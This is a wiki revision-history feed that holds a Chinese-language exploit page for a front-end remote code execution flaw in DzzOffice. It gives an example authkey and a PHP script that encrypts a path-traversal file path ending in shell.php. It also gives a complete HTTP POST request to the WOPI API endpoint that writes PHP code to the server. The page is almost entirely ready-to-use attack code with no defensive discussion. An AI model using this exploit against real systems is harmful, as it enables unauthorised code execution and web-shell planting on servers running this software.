https://pwnwiki.com/index.php?action=history&feed=atom&title=Dzzoffice_%E5%89%8D%E5%8F%B0RCE%E6%BC%8F%E6%B4%9E Dzzoffice 前台RCE漏洞 - Revision history 2026-04-21T05:21:54Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Dzzoffice_%E5%89%8D%E5%8F%B0RCE%E6%BC%8F%E6%B4%9E&diff=1657&oldid=prev Pwnwiki: Created page with "==利用前提== 首先需要獲取到authkey 這個可以通過爆破或者其他的方式獲取到具體的這個請看文章 我現在的環境的key為:3090dfHwzmw9lsC3..." 2021-04-14T08:15:40Z <p>Created page with &quot;==利用前提== 首先需要獲取到authkey 這個可以通過爆破或者其他的方式獲取到具體的這個請看文章 我現在的環境的key為:3090dfHwzmw9lsC3...&quot;</p> <p><b>New page</b></p><div>==利用前提==<br /> 首先需要獲取到authkey 這個可以通過爆破或者其他的方式獲取到具體的這個請看文章<br /> <br /> 我現在的環境的key為:3090dfHwzmw9lsC3<br /> <br /> ==加密腳本==<br /> &lt;pre&gt;<br /> &lt;?php <br /> function authcode_config($string,$key, $operation = 'DECODE', $expiry = 0)<br /> {<br /> $ckey_length = 4;<br /> $key = md5($key);<br /> $keya = md5(substr($key, 0, 16));<br /> $keyb = md5(substr($key, 16, 16));<br /> $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';<br /> <br /> $cryptkey = $keya.md5($keya.$keyc);<br /> $key_length = strlen($cryptkey);<br /> <br /> $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;<br /> $string_length = strlen($string);<br /> <br /> $result = '';<br /> $box = range(0, 255);<br /> <br /> $rndkey = array();<br /> for($i = 0; $i &lt;= 255; $i++) {<br /> $rndkey[$i] = ord($cryptkey[$i % $key_length]);<br /> }<br /> <br /> for($j = $i = 0; $i &lt; 256; $i++) {<br /> $j = ($j + $box[$i] + $rndkey[$i]) % 256;<br /> $tmp = $box[$i];<br /> $box[$i] = $box[$j];<br /> $box[$j] = $tmp;<br /> }<br /> <br /> for($a = $j = $i = 0; $i &lt; $string_length; $i++) {<br /> $a = ($a + 1) % 256;<br /> $j = ($j + $box[$a]) % 256;<br /> $tmp = $box[$a];<br /> $box[$a] = $box[$j];<br /> $box[$j] = $tmp;<br /> $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));<br /> }<br /> <br /> if($operation == 'DECODE') {<br /> if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() &gt; 0) &amp;&amp; substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {<br /> return substr($result, 26);<br /> } else {<br /> return '';<br /> }<br /> } else {<br /> return $keyc.str_replace('=', '', base64_encode($result));<br /> }<br /> }<br /> <br /> echo base64_encode(authcode_config(&quot;disk::..././..././..././shell.php&quot;,md5('3090dfHwzmw9lsC3'),'ENCODE'));<br /> <br /> <br /> &lt;/pre&gt;<br /> <br /> ==Payload==<br /> &lt;pre&gt;<br /> POST /core/api/wopi/index.php?access_token=1&amp;action=contents&amp;path=ZmM0OWp3bDgxbDE3WlhocFlCVUl4ZDFvRkNYeDRVaGtQbklJYlVSUjV2VjRzLzBwUkJ0Y051ZHl4QzVITFlvN205cENqZktDY1lyNHRQQ0pWblU= HTTP/1.1<br /> Host: word.com<br /> Content-Length: 18<br /> Accept: application/json, text/javascript, */*; q=0.01<br /> X-Requested-With: XMLHttpRequest<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36<br /> Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br /> Origin: http://word.com<br /> Referer: http://word.com/user.php?mod=login<br /> Accept-Encoding: gzip, deflate<br /> Accept-Language: zh-CN,zh;q=0.9<br /> Connection: close<br /> <br /> &lt;?php phpinfo();?&gt;<br /> &lt;/pre&gt;</div> Pwnwiki